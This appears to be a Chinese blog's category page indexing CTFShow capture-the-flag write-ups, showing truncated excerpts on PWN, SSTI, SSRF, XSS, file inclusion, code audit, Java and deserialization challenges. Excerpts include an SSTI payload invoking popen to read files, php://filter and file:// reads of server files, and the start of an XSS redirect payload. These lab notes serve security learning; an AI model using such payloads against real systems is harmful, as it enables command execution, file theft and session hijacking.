分类: CTFShow

18 篇文章

thumbnail
【原创】CTFShow-PWN
[huayang] PWN签到题 用公网的服务器弹一下就出来了 pwn02 下载得到文件 先用file查看文件是几位的 这个是几位就用几位的ida进行打开 再用checksec查看一下保护 【1】RELRO:RELRO会有Partial RELRO和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表,Full Relro重定位表只读 【2】Stack:No Canary…
thumbnail
【原创】CTFShow—SSTI
[huayang] web361 ?name={{().__class__.__bases__[-1].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}} web362 {{x.__init__.__globals__['__builtins__'].eval('__im…
thumbnail
【原创】CTFshow—黑盒测试
[huayang] 简单来说就是用前面所学过的知识测试当前网站 web380 暴躁羽师傅 提示id参数打开失败 我们随便定义一个 通过伪协议读取一下page 进行base64编码再试试 page.php?id=php://filter/convert.base64-encode/resource=page 文件包含 view-source:http://d491207b-62d2-47f5-a91…
thumbnail
【原创】CTFshow—SSRF
[huayang] web351 尝试读一下日志文件 url=file:///var/log/nginx/access.log url=file:///var/www/html/flag.php 方法二 url=http://127.0.0.1/flag.php web352 web352 url=http:/0x7f.0.0.1/flag.php web354 url=http://sudo.c…
thumbnail
【原创】CTFshow—XSS
[huayang] 首先要在这个平台注册一个账号:https://xss.pt/ 看到我的项目,点击创建项目 随便写然后下一步 最后查看代码就可以进行攻击啦 web316 标准代码即可 web317—319 web320—322 新增了空格过滤用tap绕过即可 注意tap在记事本里打在vscode上不行 web323-326 <body/onload=document.location='i…
thumbnail
【原创】CTFshow—代码审计
[huayang] 该来的还是要来 分享个代码审计的工具Seay 链接: https://pan.baidu.com/s/1Bf4CzqN2Dk1NjCpnC2laXA 密码: c99g web301 下载源码审计看看 我审nm个***** 去看看检测登录的checklogin.php文件 sql语句没有任何过滤 sqlmap跑一下 因为这里看不见注入点 所以就需要用bp抓包引入数据 复制数据保存…
thumbnail
【原创】CTFshow—java
[huayang] 没有一点功底根本就不行 直接转羽师傅的 啊啊啊java白学了tm的啥都看不懂 WEB279-294 296-297 怕链接挂了就直接贴上来 下载链接:https://pan.baidu.com/s/19yr0tWbG1UU_ULjEan5ttQ 提取码:bn71 # coding=UTF-8 import shlex import random import base64 im…
thumbnail
【原创】CTFshow—反序列化(254—278)
头疼的序列化来了,想起被代码审计支配的恐惧,难受 web254 ?username=xxxxxx&password=xxxxxx 还是有个小知识:Public Function 和 Function 的区别 web255 课代表来啦 <?phpclass ctfShowUser{ public $isVip=true;}echo serialize(new ctfShowUser);…